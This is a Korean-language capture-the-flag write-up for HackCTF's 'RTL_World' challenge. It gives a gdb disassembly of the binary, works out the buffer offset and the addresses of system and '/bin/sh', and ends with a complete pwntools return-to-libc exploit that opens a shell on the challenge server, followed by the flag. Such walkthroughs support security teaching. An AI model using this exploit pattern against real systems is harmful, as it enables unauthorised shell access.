WriteUp/HackCTF
[HackCTF] RTL_World
d2n0s4ur
2021. 8. 8. 14:00
gdb를 이용해 파일을 디스어셈블시키자.
0x08048983 <+0>: push ebp
0x08048984 <+1>: mov ebp,esp
0x08048986 <+3>: sub esp,0xa0
0x0804898c <+9>: mov eax,ds:0x804b060
0x08048991 <+14>: mov DWORD PTR [esp+0xc],0x0
0x08048999 <+22>: mov DWORD PTR [esp+0x8],0x2
0x080489a1 <+30>: mov DWORD PTR [esp+0x4],0x0
0x080489a9 <+38>: mov DWORD PTR [esp],eax
0x080489ac <+41>: call 0x8048600 <setvbuf@plt>
0x080489b1 <+46>: mov DWORD PTR [ebp-0x8],0x0
0x080489b8 <+53>: mov DWORD PTR [esp+0x4],0x1
0x080489c0 <+61>: mov DWORD PTR [esp],0x8048e8c
0x080489c7 <+68>: call 0x8048630 <dlopen@plt>
0x080489cc <+73>: mov DWORD PTR [ebp-0x8],eax
0x080489cf <+76>: mov DWORD PTR [esp+0x4],0x8048eaa
0x080489d7 <+84>: mov eax,DWORD PTR [ebp-0x8]
0x080489da <+87>: mov DWORD PTR [esp],eax
0x080489dd <+90>: call 0x80485f0 <dlsym@plt>
0x080489e2 <+95>: mov DWORD PTR [ebp-0xc],eax
0x080489e5 <+98>: mov eax,DWORD PTR [ebp-0x8]
0x080489e8 <+101>: mov DWORD PTR [esp],eax
0x080489eb <+104>: call 0x8048590 <dlclose@plt>
0x080489f0 <+109>: mov eax,DWORD PTR [ebp-0xc]
0x080489f3 <+112>: mov DWORD PTR [ebp-0x4],eax
0x080489f6 <+115>: jmp 0x80489fc <main+121>
0x080489f8 <+117>: add DWORD PTR [ebp-0x4],0x1
0x080489fc <+121>: mov eax,DWORD PTR [ebp-0x4]
0x080489ff <+124>: mov DWORD PTR [esp+0x8],0x8
0x08048a07 <+132>: mov DWORD PTR [esp+0x4],0x8048eb1
0x08048a0f <+140>: mov DWORD PTR [esp],eax
0x08048a12 <+143>: call 0x8048580 <memcmp@plt>
0x08048a17 <+148>: test eax,eax
0x08048a19 <+150>: jne 0x80489f8 <main+117>
0x08048a1b <+152>: mov DWORD PTR [esp],0x8048eb9
0x08048a22 <+159>: call 0x80485a0 <puts@plt>
0x08048a27 <+164>: mov DWORD PTR [esp],0x8048ed8
0x08048a2e <+171>: call 0x80485a0 <puts@plt>
0x08048a33 <+176>: mov DWORD PTR [esp],0x8048f0c
0x08048a3a <+183>: call 0x80485a0 <puts@plt>
0x08048a3f <+188>: mov DWORD PTR [esp],0x8048f38
0x08048a46 <+195>: call 0x80485a0 <puts@plt>
0x08048a4b <+200>: mov DWORD PTR [esp],0x8048f58
0x08048a52 <+207>: call 0x80485a0 <puts@plt>
0x08048a57 <+212>: mov eax,ds:0x804b04c
0x08048a5c <+217>: mov DWORD PTR [esp+0x4],eax
0x08048a60 <+221>: mov DWORD PTR [esp],0x8048f74
0x08048a67 <+228>: call 0x8048570 <printf@plt>
0x08048a6c <+233>: jmp 0x8048a6f <main+236>
0x08048a6e <+235>: nop
0x08048a6f <+236>: call 0x804873d <Menu>
0x08048a74 <+241>: mov DWORD PTR [esp],0x8048f84
0x08048a7b <+248>: call 0x8048570 <printf@plt>
0x08048a80 <+253>: lea eax,[ebp-0x90]
0x08048a86 <+259>: mov DWORD PTR [esp+0x4],eax
0x08048a8a <+263>: mov DWORD PTR [esp],0x8048dd9
0x08048a91 <+270>: call 0x8048620 <__isoc99_scanf@plt>
0x08048a96 <+275>: mov eax,DWORD PTR [ebp-0x90]
0x08048a9c <+281>: cmp eax,0x6
0x08048a9f <+284>: ja 0x8048a6e <main+235>
0x08048aa1 <+286>: mov eax,DWORD PTR [eax*4+0x80490cc]
0x08048aa8 <+293>: jmp eax
0x08048aaa <+295>: mov DWORD PTR [esp],0x8048f89
0x08048ab1 <+302>: call 0x80485b0 <system@plt>
0x08048ab6 <+307>: mov DWORD PTR [esp],0x8048f8f
0x08048abd <+314>: call 0x80485a0 <puts@plt>
0x08048ac2 <+319>: mov DWORD PTR [esp],0x8048f9e
0x08048ac9 <+326>: call 0x80485a0 <puts@plt>
0x08048ace <+331>: mov DWORD PTR [esp],0x8048fb7
0x08048ad5 <+338>: call 0x80485a0 <puts@plt>
0x08048ada <+343>: mov DWORD PTR [esp],0x8048fcf
0x08048ae1 <+350>: call 0x80485a0 <puts@plt>
0x08048ae6 <+355>: mov DWORD PTR [esp],0x8048fe9
0x08048aed <+362>: call 0x80485a0 <puts@plt>
0x08048af2 <+367>: mov DWORD PTR [esp],0x8048ffe
0x08048af9 <+374>: call 0x80485a0 <puts@plt>
0x08048afe <+379>: mov DWORD PTR [esp],0x804901b
0x08048b05 <+386>: call 0x80485a0 <puts@plt>
0x08048b0a <+391>: mov eax,DWORD PTR [ebp-0x8]
0x08048b0d <+394>: mov DWORD PTR [esp+0x4],eax
0x08048b11 <+398>: mov DWORD PTR [esp],0x8049029
0x08048b18 <+405>: call 0x8048570 <printf@plt>
0x08048b1d <+410>: mov DWORD PTR [esp],0x8049044
0x08048b24 <+417>: call 0x80485a0 <puts@plt>
0x08048b29 <+422>: jmp 0x8048c0b <main+648>
0x08048b2e <+427>: mov eax,ds:0x804b04c
0x08048b33 <+432>: mov DWORD PTR [esp],eax
0x08048b36 <+435>: call 0x80487a5 <Get_Money>
0x08048b3b <+440>: jmp 0x8048c0b <main+648>
0x08048b40 <+445>: mov eax,ds:0x804b04c
0x08048b45 <+450>: cmp eax,0x7cf
0x08048b4a <+455>: jle 0x8048b73 <main+496>
0x08048b4c <+457>: mov eax,ds:0x804b04c
0x08048b51 <+462>: sub eax,0x7cf
0x08048b56 <+467>: mov ds:0x804b04c,eax
0x08048b5b <+472>: mov eax,DWORD PTR [ebp-0xc]
0x08048b5e <+475>: mov DWORD PTR [esp+0x4],eax
0x08048b62 <+479>: mov DWORD PTR [esp],0x8049067
0x08048b69 <+486>: call 0x8048570 <printf@plt>
0x08048b6e <+491>: jmp 0x8048c0b <main+648>
0x08048b73 <+496>: mov DWORD PTR [esp],0x804907a
0x08048b7a <+503>: call 0x80485a0 <puts@plt>
0x08048b7f <+508>: jmp 0x8048c0b <main+648>
0x08048b84 <+513>: mov eax,ds:0x804b04c
0x08048b89 <+518>: cmp eax,0xbb7
0x08048b8e <+523>: jle 0x8048bb4 <main+561>
0x08048b90 <+525>: mov eax,ds:0x804b04c
0x08048b95 <+530>: sub eax,0xbb7
0x08048b9a <+535>: mov ds:0x804b04c,eax
0x08048b9f <+540>: mov eax,DWORD PTR [ebp-0x4]
0x08048ba2 <+543>: mov DWORD PTR [esp+0x4],eax
0x08048ba6 <+547>: mov DWORD PTR [esp],0x8049094
0x08048bad <+554>: call 0x8048570 <printf@plt>
0x08048bb2 <+559>: jmp 0x8048c0b <main+648>
0x08048bb4 <+561>: mov DWORD PTR [esp],0x804907a
0x08048bbb <+568>: call 0x80485a0 <puts@plt>
0x08048bc0 <+573>: jmp 0x8048c0b <main+648>
0x08048bc2 <+575>: mov DWORD PTR [esp],0x80490a6
0x08048bc9 <+582>: call 0x8048570 <printf@plt>
0x08048bce <+587>: mov DWORD PTR [esp+0x8],0x400
0x08048bd6 <+595>: lea eax,[ebp-0x8c]
0x08048bdc <+601>: mov DWORD PTR [esp+0x4],eax
0x08048be0 <+605>: mov DWORD PTR [esp],0x0
0x08048be7 <+612>: call 0x8048560 <read@plt>
0x08048bec <+617>: mov eax,0x0
0x08048bf1 <+622>: jmp 0x8048c10 <main+653>
0x08048bf3 <+624>: mov DWORD PTR [esp],0x80490b2
0x08048bfa <+631>: call 0x80485a0 <puts@plt>
0x08048bff <+636>: mov DWORD PTR [esp],0x0
0x08048c06 <+643>: call 0x80485d0 <exit@plt>
0x08048c0b <+648>: jmp 0x8048a6e <main+235>
0x08048c10 <+653>: leave
0x08048c11 <+654>: ret
하나하나씩 차근차근 분석해본 결과 처음 받는 입력에 대해서 5을 선택하면
read함수를 통해 인자를 Buf에 받는다.
이때 RTL이 일어나게 하면 shell을 얻을 수 있는 것으로 기대된다.
gdb를 활용해 system과 '/bin/sh'의 plt주소값을 찾는다.
system_plt = 0x80485b0
binsh = 0x8048eb1
0x08048bd6 <+595>: lea eax,[ebp-0x8c]
0x08048bdc <+601>: mov DWORD PTR [esp+0x4],eax
0x08048be0 <+605>: mov DWORD PTR [esp],0x0
0x08048be7 <+612>: call 0x8048560 <read@plt>buf의 크기가 0x8c임을 알 수 있다.
이때 RSP또한 4바이트를 차지하므로, 총 0x8c+4만큼의 공간을 DUMP로 채워야한다.
system함수가 실행된 후 RET는 중요하지 않으므로 아무값으로 4바이트를 채워준다.
이후 스택에 '/bin/sh'까지 넣어주면 payload는 완성이다.
from pwn import *
# p = process('./rtl_world')
p = remote("ctf.j0n9hyun.xyz",3010)
system_plt = 0x80485b0
binsh = 0x8048eb1
p.sendline('5')
p.recvuntil('[Attack] > ')
payload = b'a'*(0x8c+4)
payload += p32(system_plt)
payload += b'aaaa'
payload += p32(binsh)
p.sendline(payload)
p.interactive()
FLAG : HackCTF{17_w45_4_6r347_r7l_w0rld}
반응형